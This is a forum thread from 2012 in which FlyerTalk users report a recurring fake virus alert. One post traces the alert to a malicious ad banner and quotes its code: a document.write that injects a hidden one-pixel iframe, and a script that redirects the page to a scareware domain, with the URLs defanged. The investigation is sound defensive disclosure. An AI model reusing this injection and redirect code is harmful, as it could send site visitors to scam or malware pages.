FALSE Virus alert [there is NO malware on your computer]
Jul 31, 2012, 5:09 pm
#226
Join Date: Jun 2012
Location: England
Programs: Executive Club Silver
Posts: 711
And the alert always appears very very soon from typing in the Flyertalk URL so I doubt people had a chance to logon before there were molestered with this warning.
I usually type ww.flyert and then suggestions appear and I click straight onto BA executive club and the warning appears every time I have not accessed the site for a while without fail.
Maybe you could ask people to fill in a small questionnaire to agther similar characteristics and to be able to replicate the problem.
Last edited by PotNoodle; Jul 31, 2012 at 5:10 pm Reason: spelling
Jul 31, 2012, 5:15 pm
#227
Join Date: Jan 2004
Location: EXT, LHR & ORD
Programs: AA EXP MM, HH Diamond
Posts: 1,613
IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/
also does in on IE 8 on laptop - same shortcut
shortcut in favorites to : http://www.flyertalk.com/forum/
also does in on IE 8 on laptop - same shortcut
Jul 31, 2012, 7:32 pm
#228
Join Date: Jun 2000
Location: YYZ
Programs: AC, AA, UA, BA, Hilton
Posts: 2,907
Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?
Anyone seeing something similar timewise?
bj-21.
Anyone seeing something similar timewise?
bj-21.
Jul 31, 2012, 9:23 pm
#229
FlyerTalk Evangelist
Join Date: Sep 2006
Location: Toledo, OH
Programs: Delta DM & MM, Hilton DM, Marriott gold, Hyatt Globalist, Alaska 75K, Wyndham Diamond,
Posts: 15,399
Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?
Anyone seeing something similar timewise?
bj-21.
Anyone seeing something similar timewise?
bj-21.
Aug 1, 2012, 12:33 am
#231
Join Date: May 2005
Location: Near Lichfield, UK
Programs: BMI DC Gold, BA Gold, LH SEN, Priority Club Platinum, Nectar purple
Posts: 949
IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/
also does in on IE 8 on laptop - same shortcut
shortcut in favorites to : http://www.flyertalk.com/forum/
also does in on IE 8 on laptop - same shortcut
Aug 1, 2012, 4:45 am
#233
Join Date: Apr 2006
Posts: 517
Started using Chrome also, though I use it for all websites not just FT. Another benefit is that it seems to run much faster than IE. Probably won't go back to IE. FT must own stock in Google.
Last edited by dioxide45; Aug 1, 2012 at 5:11 am
Aug 1, 2012, 6:38 am
#235
Suspended
Join Date: Jan 2004
Location: UK
Posts: 11,969
Can we have a little more feedback as to why this hasn't been repaired yet? I even sent screen shots and didn't even received an acknowledgement.
With all due respect11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency.
With all due respect11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency.
Aug 1, 2012, 8:22 am
#236
Join Date: May 2005
Posts: 3,944
A new screen appeared today, when I used Chrome. Sgnificance: I think some IE material might have been residual when I went to Chrome.
Sequence of events:
(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:
Plug-in Unresponsive
[yellow caution icon with exclamation mark) The following plug-in is unresponsive: Unknown
Would you like to stop it? [boxes to check] Yes No
(10) Checked IE for residual cookies, found a Favicon (right-clicking showed this as owned by Flyertalk), and an "IE9 CompatViewList.xml", which rightclicking on showed as owned by Microsoft.
I can send a snip of the new screen but would need instructions on how to PM a jpg file.
Sequence of events:
(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:
Plug-in Unresponsive
[yellow caution icon with exclamation mark) The following plug-in is unresponsive: Unknown
Would you like to stop it? [boxes to check] Yes No
I can send a snip of the new screen but would need instructions on how to PM a jpg file.
Aug 1, 2012, 8:33 am
#237
Join Date: Aug 2010
Posts: 154
Urgent @ Admin
I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):
It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:
This appears to be a bogus site.
The above banner page contains the following malicious code:
The iframe within this code is redirecting to a html page (hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX) which contains the following HTML code:
I cannot find exactly where the source for the adliclick.com is coming from in your source code (I strongly suggest checking all your scripts for references to it), but I have a copy of the source codes from all sites when the redirect hit me. Let me know if you want copies.
I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):
It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:
(Request-Line):GET /banner.php?campaign_id=12175&rc=475737972919972 HTTP/1.1
Accept:application/javascript, */*;q=0.8
Referer:http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive
Accept:application/javascript, */*;q=0.8
Referer:http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive
This appears to be a bogus site.
The above banner page contains the following malicious code:
document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
<html>
<body>
<script>
window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/";
</script>
</body>
</html>
<body>
<script>
window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/";
</script>
</body>
</html>
Last edited by MoneyBagger; Aug 1, 2012 at 8:37 am Reason: More info
Aug 1, 2012, 9:41 am
#240
Join Date: May 2005
Location: Near Lichfield, UK
Programs: BMI DC Gold, BA Gold, LH SEN, Priority Club Platinum, Nectar purple
Posts: 949
Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised?